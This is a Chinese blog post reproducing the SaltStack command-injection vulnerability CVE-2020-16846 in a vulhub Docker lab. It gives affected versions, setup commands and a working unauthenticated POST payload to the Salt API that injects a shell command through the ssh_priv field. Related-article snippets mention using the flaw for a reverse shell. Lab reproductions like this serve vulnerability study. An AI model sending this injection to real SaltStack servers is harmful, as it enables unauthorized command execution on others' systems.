SaltStack 命令注入漏洞(CVE-2020-16846)

最新推荐文章于 2024-02-27 10:21:19 发布
最新推荐文章于 2024-02-27 10:21:19 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: 中间件漏洞复现 文章标签: 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/110718365
版权

声明

好好学习,天天向上

漏洞描述

SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。2020年11月SaltStack官方披露了CVE-2020-16846和CVE-2020-25592两个漏洞

其中CVE-2020-25592允许任意用户调用SSH模块

CVE-2020-16846允许用户执行任意命令。组合这两个漏洞,将可以使未授权的攻击者通过Salt API执行任意命令

影响范围

SaltStack < 3002.1
SaltStack < 3001.3
SaltStack < 3000.5
SaltStack < 2019.2.7

复现过程

使用vulhub

这里使用3002版本

/app/vulhub-master/saltstack/CVE-2020-16846

启动

docker-compose up -d

环境启动后,将会在本地监听如下端口:

  • 4505/4506 这是SaltStack Master与minions通信的端口
  • 8000 这是Salt的API端口,需要通过https访问
  • 2222 这是容器内部的SSH服务器监听的端口

访问

https://your-ip:8000/run

使用POST,传递下面的参数

token=12312&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=aaa|touch%20/tmp/cve-2020-16846%3b

即可执行命令

在这里插入图片描述

在这里插入图片描述

使用完关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SaltStack 远程命令执行漏洞CVE-2020-16846
m0_61506558的博客
02-26 681
SaltStack是基于Python开发的一套C/S架构配置管理工具。2020年11月SaltStack官方披露了允许用户执行任意命令。组合这两个漏洞,将可以使未授权的攻击者通 过Salt API1、在vulhub上启动docker2、访问docker靶机3、使用BP抓包访问地址4、更改请求为POST并且插入请求体,如下补充:要严格使用URL编码,同时符号 | 的作用是取后部分内容。5、写一个sh文件里面是反弹shell的命令
CVE-2020-15778漏洞-——快速升级——openssh8.6.p1.tar.gz
06-21
OpenSSH 命令注入漏洞(CVE-2020-15778),文件包含installs.sh、openssh-8.6p1.tar.gz、openssl-1.1.1k.tar.gz、zlib-1.2.11.tar.gz。升级时候将openssh.tar.gz放至/home下解压,进入openssh目录,执行chmod +x install.sh 命令,然后执行./install.sh即可 如果遇到该问题openssh Your OpenSSL headers do not match your library. vi /etc/ld.so.conf 注释该行 #/usr/local/ssl/lib
SaltStack Shell 注入 (CVE-2020-16846)漏洞复现
锋刃科技的博客
12-22 538
简介 SaltStack是一个分布式运维系统,在互联网场景中被广泛应用 漏洞简介 CVE-2020-16846CVE-2020-25592组合使用可在未授权的情况下通过salt-api接口执行任意命令CVE-2020-25592允许任意用户调用SSH模块,CVE-2020-16846允许用户执行任意命令。 影响版本 SaltStack 2015/2016/2017/2018/2019/3000/3001/3002 环境搭建 这里使用docker进行安装 下载地址: ...
SaltStack未授权访问及命令执行漏洞分析(CVE-2020-16846/25592)
小小猪的博客
10-27 612
SaltStack未授权访问及命令执行漏洞分析(CVE-2020-16846/25592) 一、漏洞背景: SaltStack是一个分布式运维系统,在互联网场景中被广泛应用,有以下两个主要功能: •配置管理系统,能够将远程节点维护在一个预定义的状态(例如,确保安装特定的软件包并运行特定的服务) •分布式远程执行系统,用于在远程节点上单独或通过任意选择标准来执行命令和查询数据 2020年11月4日,SaltStack官方发布了一则安全更新公告,其中CVE-2020-...
CVE-2020-16846Saltstack_未授权命令执行漏洞
weixin_40646615的博客
06-04 406
CVE-2020-16846Saltstack_未授权命令执行漏洞 20210510 一、漏洞简介 SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。 2020年11月SaltStack官方披露了CVE-2020-16846CVE-2020-25592两个漏洞, 其中CVE-2020-25592允许任意用户调用SSH模块,CVE-2020-16846允许用户执行任意命令。 组合这两个漏洞,将可以使未授权的攻击者通过Salt API执行任意命令。 二、漏洞影响 SaltSt
SaltStack命令执行(CVE-2020-16846)
最新发布
m0_65150886的博客
02-27 331
CVE-2020-16846CVE-2020-25592组合使用可在未授权的情况下通过salt-api接口执行任意命令CVE-2020-25592允许任意用户调用SSH模块,CVE-2020-16846允许用户执行任意命令。salt-api虽不是默认开启配置,但绝大多数SaltStack用户会选择开启salt-api,故存在较高风险。SaltStack是一个分布式运维系统,在互联网场景中被广泛应用,主要功能有配置管理系统,能够将远程节点维护在一个预定义的状态;4.进入容器查看文件成功创建。
详述SaltStack Salt 命令注入漏洞CVE-2020-16846/25592)
smellycat000的专栏
12-01 793
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队11月3日,SaltStack 发布 Salt 安全补丁,修复了三个严重漏洞,其中两个是为了回应起初通过 ZDI 报告的5个...
CVE漏洞复现-CVE-2020-16846SaltStack命令注入
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-07 746
SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。2020年11月SaltStack官方披露了CVE-2020-16846CVE-2020-16846允许用户执行任意命令
SaltStack命令注入漏洞分析(CVE-2020-16846
不忘初心,护天下安全!
07-13 321
SaltStack是一个服务器基础架构集中化管理平台,具备配置管理、远程执行、监控等功能,基于Python语言实现,结合轻量级消息队列(ZeroMQ)与Python第三方模块(Pyzmq、PyCrypto、Pyjinjia2、python-msgpack和PyYAML等)构建。通过部署SaltStack,我们可以在成千万台服务器上做到批量执行命令,根据不同业务进行配置集中化管理、分发文件、采集服务器数据、操作系统基础及软件包管理等。 CVE-2020-16846CVE-2020-25592组合使用可在未授
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
通过升级openssh到OpenSSH8.4 修复openssh低版本的漏洞 openssh8.4需要的 openssl-1.1.1g, openssh-8.4p1,zlib-1.2.11
CVE-2022-33891POC Apache Spark 命令注入CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
SaltStack Shell注入漏洞 CVE-2020-16846 漏洞复现
ADummy的博客
03-01 328
SaltStack Shell注入CVE-2020-16846) by ADummy 0x00利用路线 ​ BurpsuitePOST一个包—>命令执行 0x01漏洞介绍 ​ Salt是一种基于动态通信总线的基础架构管理的新方法。Salt可以用于数据驱动的编排,任何基础架构的远程执行,任何应用程序堆栈的配置管理等等。 2020年11月,SaltStack正式披露了两个漏洞CVE-2020-16846CVE-2020-25592。CVE-2020-25592允许任意用户使用SSH模块,CVE
SaltStack Shell注入CVE-2020-16846漏洞复现
Redredredfish的博客
09-15 445
漏洞概述 ①漏洞简介 2020年11月,SaltStack正式披露了两个漏洞CVE-2020-16846CVE-2020-25592。CVE-2020-25592允许任意用户使用SSH模块,CVE-2020-16846允许用户执行任意命令。链接这两个漏洞将允许未经授权的攻击者通过Salt API执行任意命令。 ②SaltStack SaltStack是基于Python开发的一套C/S架构配置管理工具,其使用server-agent通信模型部署轻松迅速,扩展性好,容易管理大批量服务器,可实现服务器之间
SaltStack Shell 注入 (CVE-2020-16846)漏洞
thelostworld
12-21 251
SaltStack Shell 注入 (CVE-2020-16846)漏洞复现一、漏洞简介SaltStack是一个分布式运维系统,在互联网场景中被广泛应用,有以下两个主要功能: • 配置管理系统,能够将远程节点维护在一个预定义的状态 • 分布式远程执行系统,用于在远程节点上单独或通过任意选择标准来执行命令和查询数据CVE-2020-16846CVE-2020-25592组合使用可在未授权的情况下...
SaltStack 命令注入漏洞CVE-2020-16846)复现,python编写POC
wangqiao258的博客
10-10 258
环境搭建: 使用vulhub,进入对应文件夹启动环境: [root@localhost ~]# cd /home/vulhub/saltstack/CVE-2020-16846/ [root@localhost CVE-2020-16846]# docker-compose up -d 查看端口: [root@localhost CVE-2020-16846]# docker ps CONTAINER ID IMAGE COMMAND
openssh 命令注入漏洞(cve-2020-15778)
05-26
您好,关于openssh命令注入漏洞(cve-2020-15778),这是一个影响OpenSSH版本7.2到7.9p1的漏洞,攻击者可以利用该漏洞在受害系统上执行任意命令。建议用户及时升级OpenSSH版本到7.9p1或更新版本,并且在防火墙等安全措施方面做好相应的防护工作。如果您需要更详细的信息或帮助,请告诉我。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值